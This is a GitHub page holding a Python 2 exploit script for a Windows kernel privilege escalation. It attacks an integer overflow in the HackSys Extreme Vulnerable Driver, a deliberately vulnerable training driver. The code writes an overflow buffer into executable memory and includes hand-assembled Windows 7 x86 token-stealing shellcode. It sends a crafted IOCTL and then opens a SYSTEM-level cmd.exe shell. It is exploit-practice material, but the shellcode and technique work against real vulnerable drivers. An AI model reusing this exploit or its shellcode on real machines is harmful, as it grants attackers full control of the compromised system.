exploits/HEVD/hacksysINT.py at master · theevilbit/exploits · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
from ctypes import *
from ctypes.wintypes import *
import os
import struct

GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0

METHOD_NEITHER	    = 0x3
FILE_ANY_ACCESS		= 0x0
FILE_DEVICE_UNKNOWN = 0x00000022


kernel32 = windll.kernel32
ntdll = windll.ntdll

def ctl_code(function,
             devicetype = FILE_DEVICE_UNKNOWN,
             access = FILE_ANY_ACCESS,
             method = METHOD_NEITHER):
    """Recreate CTL_CODE macro to generate driver IOCTL"""
    return ((devicetype << 16) | (access << 14) | (function << 2) | method)

def alloc_memory(base_address, input, input_size):
	"""
	Allocate input buffer
	"""
	print "[*] Allocating input buffer at %s" % hex(base_address)
	base_address_c   = c_int(base_address)
	input_size_c = c_int(input_size)
	ntdll.NtAllocateVirtualMemory.argtypes = [c_int,
											  POINTER(c_int),
											  c_ulong,
											  POINTER(c_int),
											  c_int,
											  c_int]
	dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF,
											 byref(base_address_c),
											 0x0,
											 byref(input_size_c),
											 MEM_RESERVE|MEM_COMMIT,
											 PAGE_EXECUTE_READWRITE)
	if dwStatus != STATUS_SUCCESS:
		print "[-] Error while allocating memory: %s" % dwStatus
		getLastError()
		sys.exit()
	written = c_ulong()
	alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written))
	if alloc == 0:
		print "[-] Error while writing our input buffer memory: %s" % alloc
		getLastError()
		sys.exit()

def tokenstealingx86(RETVAL, extra = ""):
	"""
	Retrun a token stealing shellcode
	"""
	#Windows 7 SP1 x86
	KPROCESS = '\x50'
	TOKEN	= '\xF8'
	UPID	 = '\xB4'
	APLINKS  = '\xB8'

	shellcode = (
	"\x60"										# pushad
	"\x33\xc0"									# xor	eax,eax
	"\x64\x8b\x80\x24\x01\x00\x00"				# mov	eax,DWORD PTR fs:[eax+0x124]
	"\x8b\x40" + KPROCESS +						# mov	eax,DWORD PTR [eax+_KPROCESS]
	"\x8b\xc8"									# mov	ecx,eax
	"\x8b\x80" + APLINKS + "\x00\x00\x00"		# mov	eax,DWORD PTR [eax+APLINKS]
	"\x2d" + APLINKS + "\x00\x00\x00"			# sub	eax,APLINKS
	"\x83\xb8" + UPID + "\x00\x00\x00\x04"		# cmp	DWORD PTR [eax+UPID],0x4
	"\x75\xec"									# jne	0xe
	"\x8b\x90" + TOKEN + "\x00\x00\x00"			# mov	edx,DWORD PTR [eax+TOKEN]
	"\x89\x91" + TOKEN + "\x00\x00\x00"			# mov	DWORD PTR [ecx+TOKEN],edx
	"\x61"										# popad
	)

	shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack

	if RETVAL == "":
		shellcode += "\xc3"						#retn
	else:
		shellcode += "\xc2" + RETVAL + "\x00"	# ret	0x8

	return shellcode

if __name__ == '__main__':
	print "[*] HackSysExtremeVulnerableDriver integer overflow privilige escalation"


	IOCTL_VULN	= ctl_code(0x809) #
	DEVICE_NAME   = "\\\\.\\HackSysExtremeVulnerableDriver"
	dwReturn	  = c_ulong()
	driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)

	#allocate input
	size = 0x1000
	input = 0x82c * "\x42" #overwrite return pointer (kernel buffer size = 824)
	input += struct.pack("L", 0xBAD0B0B0) #to stop copy
	input += (size - len(input)) * "\x42"
	alloc_memory(0x41410000, input, size)

	#allocate shellcode in memory
	SHELLCODE = tokenstealingx86(RETVAL = '\x08', extra = '\x33\xc0\x5D')
	stuff = "\x90" * 0x10 + SHELLCODE + "\x90" * (size - 0x10 - len(SHELLCODE))
	alloc_memory(0x42424242, stuff, size)

	inputbuffer	   = 0x41410000 #memory address of the input buffer
	inputbuffer_size  = 0xffffffff #causing int overflow when checked with +4
	outputbuffer_size = 0x0
	IoStatusBlock = c_ulong()
	if driver_handle:
		print "[*] Sending IOCTL and data to the driver..."
		dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
									   None,
									   None,
									   None,
									   byref(IoStatusBlock),
									   IOCTL_VULN,
									   inputbuffer,
									   inputbuffer_size,
									   None,
									   0x0
									   )

		if 'system' in os.popen('whoami').read():
			print "[+] Getting system shell..."
			os.system("cmd.exe")
		else:
			print '[-] Failed to elevate privileges'